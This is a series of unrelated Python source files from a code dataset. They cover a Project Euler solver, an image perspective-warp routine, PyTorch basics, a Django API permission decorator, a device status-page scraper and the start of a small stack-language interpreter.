codecs.open(\"lex.e2f\",\"w\",\"utf-8\")\r\n# lexf2e = codecs.open(\"lex.f2e\",\"w\",\"utf-8\")\r\ngrammarFiltered = codecs.open(\"lex.f2e\",\"w\",\"utf-8\")\r\nscfgInitRules = codecs.open(\"scfg-init-rules.txt\",\"w\",\"utf-8\")\r\nfor line in open(\"scfg-init-rules\"):\r\n\tnlword = line[line.find(\"({\") + 2 : line.find(\"})\")]\r\n\tnlword = nlword.strip()\r\n\tline = line[line.find(\"})\") + 2:]\r\n\r\n\tmrword = line[line.find(\"({\") + 2 : line.find(\"})\")]\r\n\tmrword = mrword.replace(\"' \",\"'\").replace(\" '\",\"'\").strip()\r\n\r\n\t# lexe2f.write(nlword+\" \"+mrword+\" 1.0000000\\n\")\r\n\t# lexf2e.write(mrword +\" \"+nlword+\" 1.0000000\\n\")\r\n\t#Arkansas ||| 'arkansas' ||| 0.98525 1 0.98525 1 ||| 0-0 ||| 5 5 5 ||| |||\r\n\r\n\r\n\tgf = mrword +\" \"+nlword+\" 1.0000000\\n\"\r\n\t# grammarFiltered\r\n\r\n\t#Hireo Grammar\r\n\t#[X] ||| Arkansas ||| 'arkansas' ||| 0 0 1 0.13534 0 0 ||| 0-0\r\n\tif len(nlword.split(\" \"))==1:\r\n\t\tscfgInitRules.write(\"[X] ||| \"+nlword+\" ||| \"+mrword+\" ||| 5 5 5 5 0 0 ||| 0-0\\n\")\r\n\tif len(nlword.split(\" \"))==2:\r\n\t\tscfgInitRules.write(\"[X] ||| \"+nlword+\" ||| \"+mrword+\" ||| 5 5 5 5 0 0 ||| 0-0 1-1\\n\")\r\n\tif len(nlword.split(\" \"))==3:\r\n\t\tscfgInitRules.write(\"[X] ||| \"+nlword+\" ||| \"+mrword+\" ||| 5 5 5 5 0 0 ||| 0-0 1-1 2-2\\n\")\r\n\r\n","sub_path":"rewrite two methods in WASP/scfg-init-rules.py","file_name":"scfg-init-rules.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"315410124","text":"##A perfect number is a number for which the sum of its proper divisors\n##is exactly equal to the number. For example, the sum of the proper divisors\n##of 28 would be 1 + 2 + 4 + 7 + 14 = 28, which means that 28 is a perfect number.\n##\n##A number n is called deficient if the sum of its proper divisors is less than\n##n and it is called abundant if this sum exceeds n.\n##\n##As 12 is the smallest abundant number, 1 + 2 + 3 + 4 + 6 = 16, the smallest\n##number that can be written as the sum of two abundant numbers is 24. By\n##mathematical analysis, it can be shown that all integers greater than 28123\n##can be written as the sum of two abundant numbers. However, this upper limit\n##cannot be reduced any further by analysis even though it is known that the\n##greatest number that cannot be expressed as the sum of two abundant numbers is\n##less than this limit.\n##\n##Find the sum of all the positive integers which cannot be written as the sum\n##of two abundant numbers.\n\n\n#taken from problem 21\nfrom time import time\n\nt_start = time()\n\ndef find_proper_divisors(n):\n number = 2\n total = 1\n while number <= n**(1./2):\n # goes through integers until sqrt is reached and adds bottom and\n # top numbers to total\n if n % number == 0:\n total += number\n # if the number is not a perfect square, add the other portion\n if number != n / number:\n total += n / number\n number += 1\n else:\n number += 1\n return total\n\n##def ordered_remove(ordered_list, n):\n \n\n##\nabundant_numbers = []\n\nfor i in range(11, 28124):\n if find_proper_divisors(i) > i:\n abundant_numbers.append(i)\n\nodd_abundant_numbers = [945, 1575, 2205, 2835, 3465, 4095, 4725, 5355, 5775, 5985, 6435, 6615, 6825, 7245, 7425, 7875, 8085, 8415, 8505, 8925, 9135, 9555, 9765, 10395, 11025, 11655, 12285, 12705, 12915, 13545, 14175, 14805, 15015, 15435, 16065, 16695, 17325, 17955, 18585, 19215, 19305, 19635, 19845, 20475, 21105, 21735, 21945, 22275, 22365, 22995, 23205, 23625, 24255, 24885, 25245, 25515, 25935, 26145, 26565, 26775, 27405, 28035]\n \n\n\ntotal = 0\n\n\nfor i in range(0,21000):\n removed = 0\n if i % 2 != 0:\n for number in abundant_numbers:\n if number > i or removed == 1:\n break\n for number2 in odd_abundant_numbers:\n if ((number + number2) > i):\n break\n if ((number + number2) == i):\n removed = 1\n break\n \n else:\n## removed = 1\n for number in abundant_numbers:\n if number > i or removed == 1:\n break\n for number2 in abundant_numbers:\n if ((number + number2) > i):\n break\n if ((number + number2) == i):\n removed = 1\n break\n \n \n if removed == 0:\n total += i\n\n \n\nprint(total)\nprint(time() - t_start)\n\n##sum_abund = []\n##print(len(abundant_numbers))\n##for i in range(0,len(abundant_numbers)):\n## for j in range(0,len(abundant_numbers)):\n## sum_abund.append(abundant_numbers[i]+abundant_numbers[j])\n##total = 0\n##for i in range(0,28124):\n## if i not in sum_abund:\n## total += i\n##\n##print(total)\n","sub_path":"code/Python/old/Euler/p23_v5.py","file_name":"p23_v5.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176528349","text":"\"\"\" Various string parsers. \"\"\"\n\nfrom builtins import map\ndef floatArgs(s, cnt=None, failWith=None):\n \"\"\" Parse a comma-delimited list of floats.\n\n Args:\n s - the string to parse\n cnt - if set, the required number of floats.\n failWith - if set, a string to flesh out error strings.\n\n Returns:\n a list of values.\n \n Raises:\n RuntimeError\n \"\"\"\n\n try:\n stringList = s.split(',')\n floatList = list(map(float(stringList)))\n except Exception as e:\n if failWith:\n raise RuntimeError(\"%s: %s\" % (failWith, s))\n else:\n raise\n\n if cnt != None and len(floatList) != cnt:\n raise RuntimeError(\"%s. wrong number of arguments: %s\" % (failWith, s))\n\n return floatList\n","sub_path":"CPL/strcvt.py","file_name":"strcvt.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615945156","text":"import math\n\n\ndef a_and_b(nums):\n nums = nums.split()\n a, b = int(nums[0]), int(nums[1])\n\n if a == b:\n return 0\n\n if a > b:\n a, b = b, a\n\n diff = b - a\n count = 1\n while True:\n num = 1 + 8 * diff\n root = math.sqrt(num)\n if int(root + 0.5) ** 2 == num:\n break\n else:\n diff -= count\n count += 1\n\n if count == 1:\n return int((root - 1)//2)\n else:\n return int((root - 1) // 2)\n\n\ndef main():\n num_of_tests = eval(input())\n for i in range(num_of_tests):\n nums = input()\n print(a_and_b(nums))\n\n\nmain()\n","sub_path":"Week-04/Day16/AandB.py","file_name":"AandB.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306705707","text":"import requests\nimport pandas as pd\nimport folium\n# Many of the prints & photographs in HAER are tagged with geographic coordinates ('latlong')\n# Using the requests package we imported, we can easily 'get' data for an item as JSON and parse it for our latlong:\n\nget_any_item = requests.get(\"https://www.loc.gov/item/al0006/?fo=json\")\n#print('latlong: {}'.format(get_any_item.json()['item']['latlong']))\n# To retrieve this sort of data point for a set of search results, we'll first use Laura's get_image_urls function.\n# This will allow us to store the web address for each item in a list, working through the search page by page.\n\ndef get_image_urls(url, items=[]):\n\n #Retrieves the image_ruls for items that have public URLs available.\n #Skips over items that are for the collection as a whole or web pages about the collection.\n #Handles pagination.\n\n # request pages of 100 results at a time\n params = {\"fo\": \"json\", \"c\": 100, \"at\": \"results,pagination\"}\n call = requests.get(url, params=params)\n data = call.json()\n results = data['results']\n for result in results:\n # don't try to get images from the collection-level result\n if \"collection\" not in result.get(\"original_format\") and \"web page\" not in result.get(\"original_format\"):\n # take the last URL listed in the image_url array\n item = result.get(\"id\")\n items.append(item)\n if data[\"pagination\"][\"next\"] is not None: # make sure we haven't hit the end of the pages\n next_url = data[\"pagination\"][\"next\"]\n #print(\"getting next page: {0}\".format(next_url))\n get_image_urls(next_url, items)\n\n return items\nurl = \"https://www.loc.gov/search/?fa=contributor:christianson,+justine&fo=json\"\n# This is the base URL we will use for the API requests we'll be making as we run the function.\n# retrieve all image URLs from the search results and store in a variable called 'image_urls'\nimage_urls = get_image_urls(url, items=[])\n\n# how many URLs did we get?\nlen(image_urls)\n\n# to save on a little time, let's see what the last 100 look like\nimg100 = image_urls[200:300]\n\nlen(img100)\n#create an empty set to store our latlongs\n# storing in a set rather than a list eliminates any potential duplicates\nspatial_set = set()\n\n# the parameters we set for our API calls taken the first function\np1 = {\"fo\" : \"json\"}\n\n# loop through the item URLs\nfor img in img100:\n\n # make HTTP request to loc.gov API for each item\n r = requests.get(img, params=p1)\n\n # extract only from items with latlong attribute\n try:\n\n # expose in JSON format\n data = r.json()\n\n # parse for location\n results = data['item']['latlong']\n\n # add it to our running set\n spatial_set.add(results)\n\n # skip anything with missing 'latlong' data\n except:\n\n # on to the next item until we're through\n pass\n\n# show us the data!\nspatial_set\n\n# how many unique data points were we able to gather?\nlen(spatial_set)\nlatlong_list = list(spatial_set)\ndf = pd.DataFrame(latlong_list)\ndf = df[0].str.split(',', expand=True)\ndf = df.rename(columns={0: 'latitude', 1: 'longitude'})\ndf\n\n#df.to_csv('haer_sample.csv')\n# convert spreadsheet to pandas dataframe using just the first two columns of the spreadsheet\nlatlong_df = pd.read_csv('files/haer_sample.csv', usecols=[1,2])\n# convert pandas dataframe back to a list for folium\nlatlong_list = latlong_df.values.tolist()\n\n# picking a spot in the midwest to center our map around\nCOORD = [35.481918, -97.508469]\n\n# uses lat then lon - the bigger the zoom number, the closer in you get\nmap_haer = folium.Map(location=COORD, zoom_start=3)\n\n# add a marker to the base leaflet map for every latlong pair in our list\nfor i in range(len(latlong_list)):\n folium.CircleMarker(latlong_list[i], radius=1, color='#0080bb', fill_color='#0080bb').add_to(map_haer)\n# calls the map into display\nmap_haer\n","sub_path":"python/geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223341330","text":"import numpy as np\n\ndef WarpPerspectveMatrix(src, dst):\n assert src.shape[0] == dst.shape[0] and src.shape[0] >= 4\n \n nums = src.shape[0]\n a = np.zeros((2 * nums, 8))\n b = np.zeros((2 * nums, 1))\n for i in range(0, nums):\n a_i = src[i, :]\n b_i = dst[i, :]\n a[2 * i:] = [a_i[0], a_i[1], 1, 0, 0, 0,\n -a_i[0] * b_i[0], -a_i[1] * b_i[0]]\n b[2 * i] = b_i[0]\n\n a[2 * i + 1, :] = [0, 0, 0, a_i[0], a_i[1], 1,\n -a_i[0] * b_i[1], -a_i[1] * b_i[1]]\n b[2 * i + 1] = b_i[1]\n a = np.mat(a)\n warpMatrix = a.I * b\n warpMatrix = np.insert(warpMatrix, warpMatrix.shape[0], values=1.0, axis=0)\n warpMatrix = warpMatrix.reshape(3, 3)\n return warpMatrix\n\nif __name__=='__main__':\n print('WarpMatrix')\n src = [[150.0, 457.0], [395.0, 363.0], [633.0, 291.0], [766.0, 457.0]]\n src = np.array(src)\n dst = [[46.0, 124.0], [46.0, 654.0], [634.0, 363.0], [466.0, 436.0]]\n dst = np.array(dst)\n warpMatrix = WarpPerspectveMatrix(src, dst)\n print(warpMatrix)\n","sub_path":"Homework/76+彭长江+四川/Warp.py","file_name":"Warp.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"43985838","text":"#!/usr/bin/env python3\n# -*- coding:utf8 -*-\n\nimport torch\nimport numpy as np\n\n# Tensor can store a scalar value\na = torch.tensor(3)\nprint(a) # tensor(3)\n# or an array\nb = torch.tensor([1, 2])\nprint(b) # tensor([1, 2])\n# or a matrix\nc = torch.zeros([2, 2])\nprint(c) # tensor([[0., 0.], [0., 0.]])\n# or any arbitrary dimensional tensor\nd = torch.rand([2, 2, 2])\nprint(d)\n\n\n## matrix multiple\n# @ 代表矩阵乘法 matmul\nx = torch.randn([3, 5])\ny = torch.randn([5, 4])\nz = x @ y\nd = torch.matmul(x,y)\n# z == d\n#两个矩阵相加,减,乘,除等\n\n# tensor -> numpy array, 使用torch.numpy()函数\nprint(z.numpy())\n# numpy array -> tensor, 使用from_numpy()或者直接用torch.tensor()\nnarr = np.random.normal(size=(3,4))\n#下面两个等价\nprint(torch.from_numpy(narr))\nprint(torch.tensor(narr))\n\n\n#automatic differentiation 自动微分,使用torch.autograd.grad(y, x)\nx = torch.tensor(1.0, requires_grad=True)\ndef u(x):\n return x*x\ndef g(u):\n return -2*u\n#g(x) = -2*x*x, dgdx=dgdu * dudx = -2 * 2x = -4\ny = g(u(x))\ndgdx = torch.autograd.grad(y, x)[0]\nprint(dgdx) #-4\n\n\n# curvr fitting 曲线拟合\n#初始的参数\n#假设目标函数为f(x) = ax^2 + bx + c\nw = torch.randn(3,1).requires_grad_(True)\nopt = torch.optim.Adam([w], lr=0.1)\n\ndef model(x):\n return w[0]*x*x + w[1]*x + w[2]\n#f = torch.stack([x * x, x, torch.ones_like(x)], 1)\n#yhat = torch.squeeze(f @ w, 1)\n return yhat\n\ndef compute_loss(y, yhat):\n loss = torch.nn.functional.mse_loss(yhat, y)\n return loss\n\ndef generate_data():\n # y = 5x*x + x - 10\n x = torch.rand(100) * 20 - 10\n y = 5 * x * x + 3\n return x, y\n\ndef train_step():\n #数据\n x, y = generate_data()\n #前向计算loss\n yhat = model(x)\n loss = compute_loss(yhat, y)\n #后向计算梯度\n opt.zero_grad()\n loss.backward()\n #更新梯度\n opt.step()\n\n#训练\nfor _ in range(1000):\n train_step()\n\nprint(w.detach().numpy())\n","sub_path":"01.PyTorch_Fundamentals/01_pytorch_basics.py","file_name":"01_pytorch_basics.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"330728803","text":"\"\"\"API的自定义权限class\nby yanwenchi\n2018.4.4 V1\n\"\"\"\n\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.permissions import BasePermission\n\n\nclass ApiPermission(BasePermission):\n \"\"\"ApiPermission, 检查一个token关联的用户\n 是否具有某些权限\n\n APIView需要有_api_perms的属性:\n type: list\n eg: ['api_hotupdate_callback']\n\n 管理员用户具有超级权限,不受权限系统的控制\n \"\"\"\n\n message = '权限拒绝'\n\n def has_perms(self, user, list_perm):\n \"\"\"list_perm是否在user的所有权限中\"\"\"\n\n user_perms = User.objects.get(id=user.id).get_all_permissions()\n for perm in list_perm:\n if perm in user_perms:\n return True\n return False\n\n def get_module_perms(self, view):\n \"\"\"返回view的api_perms的属性\"\"\"\n return ['users.' + x for x in view._api_perms]\n\n def has_permission(self, request, view):\n \"\"\"这里是真正检查是否具有权限的地方\n\n override this method !!!\n\n 如果有权限,返回True,不然,返回False\n\n 管理员权限不受控制\n \"\"\"\n\n if request.user.is_superuser:\n return True\n\n assert hasattr(view, '_ignore_perm') and isinstance(view._ignore_perm, bool), (\n '需要在APIView中配置_ignore_perm的属性并且为bool类型'\n )\n\n if view._ignore_perm:\n return True\n\n assert hasattr(view, '_api_perms') and isinstance(view._api_perms, list), (\n '需要在APIView中配置_api_perms的属性并且为list类型'\n )\n\n return self.has_perms(request.user, self.get_module_perms(view))\n\n\ndef api_permission(*, api_perms=[], ignore_perm=False):\n \"\"\"装饰器函数\n 用来装饰APIView,指定某个api有哪些权限\n\n api_perms是django permission的list集合\n 如果想要忽略某个api的权限,设置ignore_perm=True\n\n 用法:\n 在api的app的views.py中,装饰class\n @api_permission(api_perms=['view_host', 'view_room'])\n class CleanUserCallBack(APIView):\n ...\n\n 如果你想忽略掉某个api的权限\n @api_permission(ignore_perms=True)\n class CleanUserCallBack(APIView):\n ...\n \"\"\"\n\n def _decorate(cls):\n cls._api_perms = api_perms\n cls._ignore_perm = ignore_perm\n return cls\n return _decorate\n","sub_path":"cmdb/api_permissions.py","file_name":"api_permissions.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"151529428","text":"#!/usr/bin/python\nimport re\nimport configparser\n\nclass ProspectConf:\n \"\"\"\n This Class will be reading the configuration from prospect conf file.\n \"\"\"\n def __init__(self,logger):\n \"\"\"\n This constructor will read the conf from prospect conf file\n \"\"\"\n self.logger = logger\n self.logger.info(\"in prospect_conf,ProspectConf module\")\n self.logger.info(\"Below is the given configuration\")\n config=configparser.ConfigParser()\n config.read(\"/data/apps/0bq/ingestion/prospect/conf/prospect.config\")\n self.prospect_ingestion_dir = config.get('PROSPECT','prospect.ingestion.dir')\n self.prospect_staging_dir = config.get('PROSPECT','prospect.staging.dir')\n self.prospect_log_dir = config.get('PROSPECT','prospect.log.dir')\n self.prospect_hdfs_dir = config.get('PROSPECT','prospect.hdfs.dir')\n #PROSPECT HADOOP CONFIGURATION\n self.hive_server2 = config.get('HADOOP','prospect.hive.server2')\n self.hive_port = config.get('HADOOP','prospect.port')\n self.hive_prinicipal = config.get('HADOOP','prospect.prinicipal')\n self.hive_database = config.get('HADOOP','prospect.database')\n","sub_path":"prospect_conf.py","file_name":"prospect_conf.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"574922884","text":"import iomb.util as util\nimport unittest\nimport uuid\n\n\nclass TestUtil(unittest.TestCase):\n\n def test_make_uuid(self):\n expected = str(uuid.uuid3(uuid.NAMESPACE_OID, \"flow/a/1/b\"))\n actual = util.make_uuid(\"Flow\", None, \"a\", 1, \"B\")\n self.assertEqual(expected, actual)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605114180","text":"class Solution(object):\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n #检验每一组9个元素中是否有重复元素\n def isValid(str):\n checkDict = {'1':0, '2':0, '3':0, '4':0, '5':0, '6':0, '7':0, '8':0, '9':0}\n for i in str:\n if i != '.':\n checkDict[i] += 1\n if checkDict[i] > 1:\n return False\n return True\n\n #遍历9行\n for i in board:\n if not isValid(i):\n return False\n #遍历9列\n for i in xrange(9):\n checkStr = ''\n for j in xrange(9):\n checkStr += board[j][i]\n if not isValid(checkStr):\n return False\n #遍历9块\n for i in xrange(3):\n for j in xrange(3):\n checkStr = ''\n for k in xrange(3):\n checkStr += ''.join(board[j*3 + k][i*3:i*3+3])\n if not isValid(checkStr):\n return False\n\n return True\n","sub_path":"python/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378502853","text":"import urllib2\ndef wAlpha(s):\n inputq=urllib2.quote(s)\n url=\"http://api.wolframalpha.com/v2/query?input=\"+inputq+\"&appid=UAGAWR-3X6Y8W777Q\"\n wAlphaFile=urllib2.urlopen(url)\n wAlphaSt=wAlphaFile.read()\n titSplit=wAlphaSt.split(\"\")+len(\"\")]\n return result\n\ndef calculate(s):\n try:\n return eval(s,{})\n except:\n return wAlpha(s)\n","sub_path":"CalCalc.py","file_name":"CalCalc.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"117979985","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport urllib3\nimport re\n\n\nfrom collections import namedtuple\n\n\nUSERNAME = os.getenv('BLONDER_TONGUE_USERNAME')\nPASSWORD = os.getenv('BLONDER_TONGUE_PASSWORD')\n\n\nSESSION_ID_REGEX = re.compile(r'')\nLOGGED_IN_STR = 'Welcome Admin! Please wait while retrieving information.'\nINPUT_STATUS_REGEX = re.compile(\n r'\\s+'\n r'(?P\\d+)\\s+'\n r'(?P[\\d.]+)\\s+'\n r'(?P.+)\\s+'\n r'(?P[\\d.]+)\\s+'\n r'(?P[\\d.]+)\\s+'\n r'')\n\nInputStatus = namedtuple('InputStatus',\n ['input', 'snr', 'rf_channel', 'ts_rate', 'data_rate'])\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('host_and_port', type=str,\n help='Host and port of the http server')\n return parser.parse_args()\n\n\ndef make_cookie(session_id):\n return 'session_id={}'.format(session_id)\n\n\ndef get_session_id(http, host_and_port):\n r = http.request('GET', 'http://{}/cgi-bin/login.cgi'.format(host_and_port))\n if r.status != 200:\n raise RuntimeError('Failed to get login page')\n match_object = SESSION_ID_REGEX.search(str(r.data))\n if not match_object:\n raise RuntimeError('Failed to parse session_id from login page')\n return int(match_object.group(1))\n\n\ndef post_login(http, host_and_port, session_id):\n headers = {\n 'Cookie': make_cookie(session_id),\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Referrer': 'http://{}/cgi-bin/status.cgi?session_id={}'.format(host_and_port, session_id),\n }\n post_params = {\n 'txtUserName': USERNAME,\n 'txtPassword': PASSWORD,\n 'session_id': session_id,\n 'btnSubmit': 'Submit'\n }\n post_params_str = '&'.join('{}={}'.format(k, v) for k, v in post_params.items())\n r = http.request('POST', 'http://{}/cgi-bin/login.cgi'.format(host_and_port),\n body=post_params_str, headers=headers)\n if r.status != 200 or LOGGED_IN_STR not in str(r.data):\n raise RuntimeError('Failed to post login credentials')\n\n\ndef get_status_page(http, host_and_port, session_id):\n r = http.request('GET', 'http://{}/cgi-bin/status.cgi?session_id={}'.format(host_and_port, session_id),\n headers={'Cookie': make_cookie(session_id)})\n if r.status != 200:\n raise RuntimeError('Failed to load information page')\n return str(r.data).replace('\\\\n', '\\n')\n\n\ndef parse_status_html(html):\n matches = INPUT_STATUS_REGEX.findall(html)\n if len(matches) == 0:\n raise RuntimeError('Failed to parse status page')\n return map(lambda x: InputStatus(\n input=int(x[0]),\n snr=float(x[1]),\n rf_channel=x[2],\n ts_rate=float(x[3]),\n data_rate=x[4]), matches)\n\n\ndef main(host_and_port):\n http = urllib3.PoolManager()\n\n session_id = get_session_id(http, host_and_port)\n post_login(http, host_and_port, session_id)\n status_html = get_status_page(http, host_and_port, session_id)\n statuses = parse_status_html(status_html)\n\n # TODO: send this information to a database\n for status in statuses:\n print ('Input', status.input)\n print ('\\t\\tSNR:', status.snr)\n print ('\\t\\tRF Channel:', status.rf_channel)\n print ('\\t\\tTS Rate:', status.ts_rate)\n print ('\\t\\tData Rate:', status.data_rate)\n\n\nif __name__ == '__main__':\n main(**vars(get_args()))\n","sub_path":"src/scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281803860","text":"# test.py\n\nimport itertools, sys\n\ndef maxSongs(duration, tone, T):\n\tn = len(duration)\n\n\tsongs = [(duration[i], tone[i]) for i in range(n)]\n\t\n\tmaxSongs = 0\n\tfor i in range(1, n+1):\n\t\tsubsets = itertools.combinations(songs, i)\n\t\tfor setOfLenI in subsets:\n\t\t\tmaxTone = max(tone for (dur, tone) in setOfLenI)\n\t\t\tminTone = min(tone for (dur, tone) in setOfLenI)\n\t\t\tdurSum = sum(dur for (dur, tone) in setOfLenI)\n\n\t\t\tif ((durSum + maxTone - minTone) <= T):\n\t\t\t\tmaxSongs = i\n\t\n\treturn maxSongs\n\ndef main():\n\tassert ( maxSongs([3, 5, 4, 11],[2, 1, 3, 1],17) ) == 3","sub_path":"Python/maxSongs.py","file_name":"maxSongs.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"63481554","text":"import cv2\nimport numpy as np\n\n# Original Image\nimage = cv2.imread('paris.png')\ncv2.imshow('Original Image', image)\n\n# Define a kernel\nkernel = np.ones((5, 5), np.uint8)\n\n# Apply the erosion\nerosion = cv2.erode(image, kernel, iterations=1)\ncv2.imshow(\"Eroded Image\", erosion)\n\n# Dilation\ndilated_image = cv2.dilate(image, kernel, iterations=30)\ncv2.imshow(\"Dilated Image\", dilated_image)\n\n# Opening -> Good for reducing noise in the image\nopened_image = cv2.morphologyEx(image, cv2.MORPH_OPEN, kernel)\ncv2.imshow(\"Morph Open\", opened_image)\n\n# Morph Closing the images -> Good for noise reduction on images.\nmorph_closed = cv2.morphologyEx(image, cv2.MORPH_CLOSE, kernel)\ncv2.imshow(\"Morph Closed\", morph_closed)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"dialation_erosion_opening_and_closing.py","file_name":"dialation_erosion_opening_and_closing.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"71954090","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport collections\nimport copy\nimport time\nimport itertools\nimport numbers\nimport math\nimport random\nfrom warnings import warn\n\nIN_REPL = False\nMIDLINE = 0\nDATA = []\n\nif sys.version_info[0] < 3:\n str = basestring\n input = raw_input\nelse:\n str = str\n input = input\n\nescapes = {\n r\"\\n\": \"\\n\", r\"\\r\": \"\\r\", r\"\\a\": \"\\a\", r\"\\f\": \"\\f\",\n r\"\\t\": \"\\t\", r\"\\b\": \"\\b\", r\"\\v\": \"\\v\", r\"\\e\": \"\\x1B\",\n}\n\n\ndef escape(string):\n string = re.sub(r\"\\\\x[\\da-fA-F]{2}\", lambda s: chr(int(s.group(0)[2:], 16)), string)\n string = re.sub(r\"\\\\(.)\", lambda s: escapes.get(s.group(0), s.group(1)), string)\n return string\n\n\ndef to_num(string):\n string = string.replace('_', '')\n if '.' in string or 'e' in string:\n return float(string)\n elif string.startswith(\"0b\"):\n return int(string, 2)\n elif string.startswith(\"0o\"):\n return int(string, 8)\n elif string.startswith(\"0d\"):\n return int(string[2:], 10)\n elif string.startswith(\"0x\"):\n return int(string, 16)\n elif string.startswith(\"0u\") and all(c == '1' for c in string):\n return len(string[2:])\n else:\n return int(string, 10)\n\n\nREGEX_FLAGS = {\n 'x': re.X, # extended\n 'm': re.M, # multiline\n 'i': re.I, # ignore case\n 'l': re.L, # locale-dependent\n 's': re.S, # dot matches everything\n 'u': re.U, # slash classes use Unicode\n 'd': re.DEBUG, # show debug info during compilation\n}\n\n\ndef to_regex(string):\n last_pipe = string.rfind('|')\n body = escape(string[2:last_pipe])\n flags = string[last_pipe + 1:]\n if flags:\n flags = reduce(lambda m, c: m | c, map(REGEX_FLAGS.__getitem__, list(flags)), 0)\n else:\n flags = 0\n return re.compile(escape(string), flags)\n\n\nclass Word:\n \"\"\"\n An exceedingly simple wrapper class. Just needs to exist so we can safely and definitely\n distinguish between this and Strings.\n \"\"\"\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return \"word:`{}`\".format(self.name)\n \n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self.name == other.name\n else:\n return False\n\n\nsearches = collections.OrderedDict([ # TODO Make OOP!\n (r'\"', [r'.(? }}\".format(len(self.words))\n\n def __repr__(self): return \"{{ {} }}\".format(' '.join(map(repr, self.words)))\n\n def typename(self): return 'block'\n\n\nsource_files = sys.argv[1:]\nif source_files:\n # if files are given, we parse the files.\n def source_func():\n for filepath in source_files:\n with open(filepath) as cur_file:\n for line in cur_file:\n yield line\nelse:\n # otherwise, we use the REPL.\n IN_REPL = True\n def source_func():\n def print_nnl(s):\n sys.stdout.write(s)\n sys.stdout.flush()\n\n print(\"Welcome to the Concaten REPL.\")\n print(\"It is currently {}\".\n format(time.strftime(\"%X, %x\")))\n while True:\n if IN_REPL and MIDLINE == 0: print(\"stack: {}\".format(', '.join(map(repr, DATA))))\n if MIDLINE > 0: print_nnl(\". \")\n else: print_nnl(\"> \")\n try:\n user_input = input() + '\\n'\n except KeyboardInterrupt:\n break\n yield user_input\n print(\"Goodbye!\")\n\n\ndef get_candidates(word, scopes):\n token_name = word.name\n for scope in reversed(scopes):\n if token_name in scope:\n cands = scope[token_name]\n if isinstance(cands, collections.Iterable):\n for item in cands: yield item\n else:\n yield cands\n\n\ndef get_until_matching(source, opening, closing, starts_after_first=True):\n # MIDLINE += 1\n matched_c = 1 if starts_after_first else 0\n block_contents = []\n try:\n while matched_c != 0:\n thing = next(source)\n if isinstance(thing, Word):\n name = thing.name # convert from word to string\n if name == opening:\n matched_c += 1\n if name == closing:\n matched_c -= 1\n block_contents.append(thing)\n except StopIteration:\n raise ValueError(\"Could not find matching {} for the {}\".format(closing, opening))\n # MIDLINE -= 1\n return block_contents[:-1] if starts_after_first else block_contents\n\n\ndef parse(command_stack, data_stack, word_scopes):\n command_stack = iter(command_stack)\n for token in command_stack:\n if not isinstance(token, Word):\n data_stack.append(token)\n else:\n candidates = list(get_candidates(token, word_scopes))\n if candidates:\n for candidate in candidates:\n try:\n candidate(data_stack, word_scopes)\n break\n except CTNTypeMismatch:\n pass # This error means one word failed in the expected way, and that we\n # we should continue trying other candidates.\n else:\n raise Exception(\"Could not find word `{}` with matching types\".format(token))\n else:\n token = token.name # convert from word to string\n if token == 'return':\n return\n elif token == 'stack-inspect':\n print(repr(data_stack))\n elif token == '{':\n block_contents = get_until_matching(command_stack, '{', '}')\n data_stack.append(ConcatenBlock(block_contents))\n elif token == '[':\n words = get_until_matching(command_stack, '[', ']')\n stack_c = copy.deepcopy(data_stack)\n ConcatenBlock(words)(stack_c, word_scopes)\n changed = stack_c[len(data_stack):]\n data_stack.append(changed)\n else:\n raise Exception(\"Could not find a word called {!r}\".format(token))\n \n\n\ndef __get_ctn_name(obj):\n try:\n return obj.typename()\n except:\n pyt = obj.__class__.__name__\n if pyt == 'NoneType': return 'null'\n elif pyt == 'list': return 'array'\n elif pyt == 'str': return 'string'\n elif pyt == 'long': 